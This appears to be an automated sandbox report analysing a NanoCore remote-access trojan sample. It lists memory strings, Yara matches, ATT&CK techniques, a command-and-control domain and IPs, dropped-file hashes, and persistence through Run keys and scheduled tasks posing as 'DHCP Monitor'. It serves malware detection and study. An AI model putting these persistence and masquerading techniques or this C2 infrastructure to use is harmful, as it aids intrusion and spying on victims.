    Source: RegSvcs.exe, 00000005.00000002.560410383.0000000006110000.00000004.00020000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
    Source: RegSvcs.exe, 00000005.00000002.559058243.0000000003A79000.00000004.00000001.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoProtectClient.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoProtectClientClientPluginResourcesNanoProtectClient.My.ResourcesMySettingsMySettingsPropertyFunctionsNanoProtectClient.NanoProtectMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CulturevalueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsGetProtectDirectoryGetProtectFileCreateProtectFileKillNanoCoreSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeLogClientMessageSystem.IOFileExistsReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedEnvironmentSpecialFolderGetFolderPathPathCombineExceptionDirectoryDirectoryInfoCreateDirectoryFileStreamCreateProjectDataSetProjectErrorClearProjectErrorProcessGetCurrentProcessKillNanoProtectClient.Resources.resourcesDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeNanoProtectClient.dlla[NanoProtect]: Checking for NanoProtect module..
    Source: cjlaro.pif, 00000014.00000003.363952559.00000000048CF000.00000004.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost
    Yara detected Nanocore RATShow sources
    Source: Yara matchFile source: 20.3.cjlaro.pif.48ce458.0.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 20.3.cjlaro.pif.4902870.9.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 20.3.cjlaro.pif.496b880.5.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 4.3.cjlaro.pif.4e6e068.2.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 4.3.cjlaro.pif.4ed7078.1.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 5.2.RegSvcs.exe.500000.0.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 5.2.RegSvcs.exe.3a807ce.3.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 5.2.RegSvcs.exe.61b0000.8.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 20.3.cjlaro.pif.496b880.6.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 20.3.cjlaro.pif.496b880.5.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 5.2.RegSvcs.exe.61b4629.9.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 20.3.cjlaro.pif.4902870.4.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 20.3.cjlaro.pif.4902870.4.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 20.3.cjlaro.pif.4902870.8.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 4.3.cjlaro.pif.4e05058.0.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 4.3.cjlaro.pif.4ed7078.1.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 20.3.cjlaro.pif.496b880.6.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 20.3.cjlaro.pif.4902870.7.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 5.2.RegSvcs.exe.61b0000.8.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 20.3.cjlaro.pif.4902870.7.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 5.2.RegSvcs.exe.3a8b041.5.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 20.3.cjlaro.pif.4902870.8.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 20.3.cjlaro.pif.4899c50.2.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 5.2.RegSvcs.exe.3a8560b.4.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 4.3.cjlaro.pif.4e6e068.2.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 20.3.cjlaro.pif.4902870.9.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 5.2.RegSvcs.exe.3a8b041.5.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 20.3.cjlaro.pif.4865448.3.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 20.3.cjlaro.pif.4899c50.1.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 0000001B.00000003.383284019.000000000478A000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000004.00000003.315424551.0000000004EA3000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000005.00000002.555314514.0000000000502000.00000040.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000014.00000003.359982101.00000000048CF000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000014.00000003.363952559.00000000048CF000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000001B.00000003.383566865.00000000047F3000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000001B.00000003.385418574.0000000004828000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000014.00000003.363022584.0000000004938000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000014.00000003.360137256.000000000489A000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000019.00000002.390692877.0000000000F62000.00000040.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000004.00000003.314549221.0000000004D88000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000001B.00000003.386694211.0000000004721000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000004.00000003.315994973.0000000004E6E000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000014.00000003.364780852.000000000489A000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000001B.00000003.386537145.00000000047F2000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000019.00000002.391670186.0000000003411000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000001B.00000003.383169195.00000000047BF000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000001B.00000003.385532540.00000000010C3000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000019.00000002.391832360.0000000004419000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000004.00000003.316144236.0000000004E6E000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000014.00000003.360433850.0000000004903000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000005.00000002.560490990.00000000061B0000.00000004.00020000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000014.00000003.360821611.000000000496B000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000004.00000003.314585596.0000000004E06000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000004.00000003.315927794.0000000004E06000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000005.00000002.559058243.0000000003A79000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000001B.00000003.386511135.000000000478A000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000004.00000003.316303784.0000000004DD1000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000001B.00000003.383645453.000000000485B000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000014.00000003.366099101.0000000004902000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000004.00000003.315764008.0000000004E3A000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000014.00000003.370237585.0000000004831000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000001B.00000003.386616181.0000000004756000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000001B.00000003.383202245.0000000004721000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000001B.00000003.383407849.00000000047BF000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000014.00000003.369728872.0000000004866000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000014.00000003.363076349.00000000039E5000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000004.00000003.316393189.0000000004D88000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000001E.00000002.406011428.0000000000D02000.00000040.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000014.00000003.360037831.0000000004831000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000001B.00000003.383348180.0000000004756000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000004.00000003.314529331.0000000004E3A000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000014.00000003.360563466.0000000004903000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000014.00000003.360697455.0000000004938000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000004.00000003.314683885.0000000004EA3000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000004.00000003.314613880.0000000004DD1000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000005.00000002.557771680.0000000002A31000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000014.00000003.366655070.0000000004902000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000004.00000003.314455197.0000000004DD1000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000001B.00000003.383504563.00000000047F3000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000014.00000003.360273834.0000000004866000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000001E.00000002.411732283.00000000033A1000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000001B.00000003.386566314.00000000047F2000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000014.00000003.360354824.00000000048CF000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000001B.00000003.386381872.00000000047BF000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000001E.00000002.412114966.00000000043A9000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000001B.00000003.383082558.0000000004756000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000014.00000003.359604202.0000000004866000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000001B.00000003.383597669.0000000004828000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: Process Memory Space: cjlaro.pif PID: 5028, type: MEMORYSTR
    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 6364, type: MEMORYSTR
    Source: Yara matchFile source: Process Memory Space: cjlaro.pif PID: 7152, type: MEMORYSTR
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 4_2_0119C06C OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject,4_2_0119C06C
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 4_2_011A65D3 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,4_2_011A65D3
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 10_2_0119C06C OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,#35,10_2_0119C06C
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 20_2_01194EFB socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,20_2_01194EFB

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid Accounts2Scripting11DLL Side-Loading1Exploitation for Privilege Escalation1Disable or Modify Tools11Input Capture41System Time Discovery2Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumIngress Tool Transfer1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
    Default AccountsNative API1Valid Accounts2DLL Side-Loading1Deobfuscate/Decode Files or Information11LSASS MemoryAccount Discovery1Remote Desktop ProtocolInput Capture41Exfiltration Over BluetoothEncrypted Channel1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsCommand and Scripting Interpreter2Scheduled Task/Job1Valid Accounts2Scripting11Security Account ManagerFile and Directory Discovery3SMB/Windows Admin SharesClipboard Data2Automated ExfiltrationNon-Standard Port1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsScheduled Task/Job1Logon Script (Mac)Access Token Manipulation21Obfuscated Files or Information2NTDSSystem Information Discovery36Distributed Component Object ModelInput CaptureScheduled TransferRemote Access Software1SIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptProcess Injection312Software Packing12LSA SecretsSecurity Software Discovery121SSHKeyloggingData Transfer Size LimitsNon-Application Layer Protocol1Manipulate Device CommunicationManipulate App Store Rankings or Ratings
    Replication Through Removable MediaLaunchdRc.commonScheduled Task/Job1DLL Side-Loading1Cached Domain CredentialsVirtualization/Sandbox Evasion21VNCGUI Input CaptureExfiltration Over C2 ChannelApplication Layer Protocol11Jamming or Denial of ServiceAbuse Accessibility Features
    External Remote ServicesScheduled TaskStartup ItemsStartup ItemsMasquerading12DCSyncProcess Discovery2Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
    Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobValid Accounts2Proc FilesystemApplication Window Discovery11Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
    Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Virtualization/Sandbox Evasion21/etc/passwd and /etc/shadowSystem Owner/User Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
    Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Access Token Manipulation21Network SniffingRemote System Discovery1Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
    Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronProcess Injection312Input CapturePermission Groups DiscoveryReplication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop
    Compromise Software Supply ChainUnix ShellLaunchdLaunchdHidden Files and Directories1KeyloggingLocal GroupsComponent Object Model and Distributed COMScreen CaptureExfiltration over USBDNSInhibit System Recovery

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet
    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 500304 Sample: dUzAkYsvl8.exe Startdate: 11/10/2021 Architecture: WINDOWS Score: 100 48 strongodss.ddns.net 2->48 54 Malicious sample detected (through community Yara rule) 2->54 56 Multi AV Scanner detection for submitted file 2->56 58 Sigma detected: NanoCore 2->58 60 8 other signatures 2->60 10 dUzAkYsvl8.exe 29 2->10         started        14 cjlaro.pif 2->14         started        16 RegSvcs.exe 2 2->16         started        18 3 other processes 2->18 signatures3 process4 file5 40 C:\Users\user\77066510\cjlaro.pif, PE32 10->40 dropped 70 Drops PE files with a suspicious file extension 10->70 20 cjlaro.pif 2 4 10->20         started        72 Writes to foreign memory regions 14->72 74 Allocates memory in foreign processes 14->74 76 Injects a PE file into a foreign processes 14->76 23 conhost.exe 16->23         started        25 conhost.exe 18->25         started        signatures6 process7 signatures8 62 Multi AV Scanner detection for dropped file 20->62 64 Machine Learning detection for dropped file 20->64 66 Writes to foreign memory regions 20->66 68 2 other signatures 20->68 27 RegSvcs.exe 1 11 20->27         started        process9 dnsIp10 50 185.19.85.175, 48562, 49764, 49791 DATAWIRE-ASCH Switzerland 27->50 52 strongodss.ddns.net 197.210.84.227, 48562 VCG-ASNG Nigeria 27->52 42 C:\Users\user\AppData\Roaming\...\run.dat, Non-ISO 27->42 dropped 44 C:\Users\user\AppData\Local\...\tmp1EC2.tmp, XML 27->44 dropped 46 C:\Program Files (x86)\...\dhcpmon.exe, PE32 27->46 dropped 78 Protects its processes via BreakOnTermination flag 27->78 80 Uses schtasks.exe or at.exe to add and modify task schedules 27->80 82 Hides that the sample has been downloaded from the Internet (zone.identifier) 27->82 32 schtasks.exe 1 27->32         started        34 schtasks.exe 1 27->34         started        file11 signatures12 process13 process14 36 conhost.exe 32->36         started        38 conhost.exe 34->38         started       

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    dUzAkYsvl8.exe52%VirustotalBrowse
    dUzAkYsvl8.exe56%ReversingLabsWin32.Trojan.Lisk
    dUzAkYsvl8.exe100%Joe Sandbox ML

    Dropped Files

    SourceDetectionScannerLabelLink
    C:\Users\user\77066510\cjlaro.pif100%Joe Sandbox ML
    C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe0%MetadefenderBrowse
    C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe0%ReversingLabs
    C:\Users\user\77066510\cjlaro.pif37%MetadefenderBrowse
    C:\Users\user\77066510\cjlaro.pif56%ReversingLabsWin32.Packed.Generic

    Unpacked PE Files

    SourceDetectionScannerLabelLinkDownload
    5.2.RegSvcs.exe.500000.0.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
    5.2.RegSvcs.exe.61b0000.8.unpack100%AviraTR/NanoCore.fadteDownload File

    Domains

    No Antivirus matches

    URLs

    SourceDetectionScannerLabelLink
    http://www.onnodb.com/aetraymenuH(0%Avira URL Cloudsafe
    http://crl.microsof0%URL Reputationsafe
    http://crl.micrH0%Avira URL Cloudsafe

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    strongodss.ddns.net
    		197.210.84.227
    		truefalse
      		high

      URLs from Memory and Binaries

      NameSourceMaliciousAntivirus DetectionReputation
      http://www.onnodb.com/aetraymenuH(cjlaro.pif, 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp, cjlaro.pif, 0000000A.00000002.337157263.00000000011DB000.00000002.00020000.sdmp, cjlaro.pif, 00000014.00000000.348819086.00000000011DB000.00000002.00020000.sdmpfalse
      • Avira URL Cloud: safe
      		unknown
      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRegSvcs.exe, 00000005.00000002.557771680.0000000002A31000.00000004.00000001.sdmpfalse
        		high
        http://crl.microsofRegSvcs.exe, 00000005.00000002.556279118.0000000000E08000.00000004.00000020.sdmpfalse
        • URL Reputation: safe
        		unknown
        http://crl.micrHRegSvcs.exe, 00000005.00000002.556279118.0000000000E08000.00000004.00000020.sdmpfalse
        • Avira URL Cloud: safe
        		unknown

        Contacted IPs

        • No. of IPs < 25%
        • 25% < No. of IPs < 50%
        • 50% < No. of IPs < 75%
        • 75% < No. of IPs

        Public

        IPDomainCountryFlagASNASN NameMalicious
        185.19.85.175
        		unknownSwitzerland
        		48971DATAWIRE-ASCHtrue
        197.210.84.227
        		strongodss.ddns.netNigeria
        		29465VCG-ASNGfalse

        General Information

        Joe Sandbox Version:33.0.0 White Diamond
        Analysis ID:500304
        Start date:11.10.2021
        Start time:22:27:55
        Joe Sandbox Product:CloudBasic
        Overall analysis duration:0h 14m 36s
        Hypervisor based Inspection enabled:false
        Report type:full
        Sample file name:dUzAkYsvl8.exe
        Cookbook file name:default.jbs
        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
        Number of analysed new started processes analysed:45
        Number of new started drivers analysed:0
        Number of existing processes analysed:0
        Number of existing drivers analysed:0
        Number of injected processes analysed:0
        Technologies:
        • HCA enabled
        • EGA enabled
        • HDC enabled
        • AMSI enabled
        Analysis Mode:default
        Analysis stop reason:Timeout
        Detection:MAL
        Classification:mal100.troj.spyw.evad.winEXE@26/37@6/2
        EGA Information:Failed
        HDC Information:
        • Successful, ratio: 17.3% (good quality ratio 16.6%)
        • Quality average: 77.7%
        • Quality standard deviation: 26.3%
        HCA Information:
        • Successful, ratio: 80%
        • Number of executed functions: 170
        • Number of non-executed functions: 216
        Cookbook Comments:
        • Adjust boot time
        • Enable AMSI
        • Found application associated with file extension: .exe
        Warnings:
        Show All
        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, audiodg.exe, BackgroundTransferHost.exe, consent.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
        • Excluded IPs from analysis (whitelisted): 20.50.102.62, 8.247.248.223, 8.247.248.249, 8.247.244.221, 2.20.178.56, 2.20.178.10, 20.199.120.151, 20.199.120.85, 2.20.178.24, 2.20.178.18, 20.199.120.182, 52.251.79.25, 20.54.110.249, 40.112.88.60
        • Excluded domains from analysis (whitelisted): fg.download.windowsupdate.com.c.footprint.net, client.wns.windows.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu-shim.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, consumer-displaycatalogrp-aks2aks-useast.md.mp.microsoft.com.akadns.net, eus2-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, asf-ris-prod-neu.northeurope.cloudapp.azure.com, ctldl.windowsupdate.com, a767.dspw65.akamai.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, a1449.dscg2.akamai.net, arc.msn.com, download.windowsupdate.com.edgesuite.net, ris.api.iris.microsoft.com, wns.notify.trafficmanager.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, displaycatalog-rp-useast.md.mp.microsoft.com.akadns.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
        • Not all processes where analyzed, report is missing behavior information
        • Report creation exceeded maximum time and may have missing behavior and disassembly information.
        • Report creation exceeded maximum time and may have missing disassembly code information.
        • Report size exceeded maximum capacity and may have missing behavior information.
        • Report size exceeded maximum capacity and may have missing disassembly code.
        • Report size getting too big, too many NtOpenKeyEx calls found.
        • Report size getting too big, too many NtProtectVirtualMemory calls found.
        • Report size getting too big, too many NtQueryValueKey calls found.
        • Report size getting too big, too many NtSetInformationFile calls found.

        Simulations

        Behavior and APIs

        TimeTypeDescription
        22:29:03AutostartRun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run Chrome C:\Users\user\77066510\cjlaro.pif C:\Users\user\77066510\txoxpdjc.qnr
        22:29:12AutostartRun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run AutoUpdate C:\Users\user\77066510\Update.vbs
        22:29:13Task SchedulerRun new task: DHCP Monitor path: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" s>$(Arg0)
        22:29:13API Interceptor839x Sleep call for process: RegSvcs.exe modified
        22:29:16Task SchedulerRun new task: DHCP Monitor Task path: "C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe" s>$(Arg0)
        22:29:21AutostartRun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run DHCP Monitor C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe

        Joe Sandbox View / Context

        IPs

        No context

        Domains

        No context

        ASN

        No context

        JA3 Fingerprints

        No context

        Dropped Files

        No context

        Created / dropped Files

        C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
        File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
        Category:dropped
        Size (bytes):45152
        Entropy (8bit):6.149629800481177
        Encrypted:false
        SSDEEP:768:bBbSoy+SdIBf0k2dsYyV6Iq87PiU9FViaLmf:EoOIBf0ddsYy8LUjVBC
        MD5:2867A3817C9245F7CF518524DFD18F28
        SHA1:D7BA2A111CEDD5BF523224B3F1CFE58EEC7C2FDC
        SHA-256:43026DCFF238F20CFF0419924486DEE45178119CFDD0D366B79D67D950A9BF50
        SHA-512:7D3D3DBB42B7966644D716AA9CBC75327B2ACB02E43C61F1DAD4AFE5521F9FE248B33347DFE15B637FB33EB97CDB322BCAEAE08BAE3F2FD863A9AD9B3A4D6B42
        Malicious:false
        Antivirus:
        • Antivirus: Metadefender, Detection: 0%, Browse
        • Antivirus: ReversingLabs, Detection: 0%
        Reputation:unknown
